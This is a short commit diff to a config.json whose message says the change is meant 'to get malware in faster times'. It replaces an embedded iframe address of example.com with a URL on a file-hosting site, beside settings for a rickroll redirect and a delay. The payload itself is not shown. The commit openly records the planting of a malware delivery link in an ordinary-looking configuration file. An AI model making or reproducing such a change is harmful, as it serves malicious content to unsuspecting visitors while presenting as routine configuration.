update url to get malware in faster times

--- a/config.json
+++ b/config.json
@@ -12,5 +12,5 @@
 
   "redirect": "https://shattereddisk.github.io/rickroll/rickroll.mp4",
   "delay": 10000,
-  "iframe": "https://example.com"
+  "iframe": "https://cloudsaze.com/file/fd5996"
 }
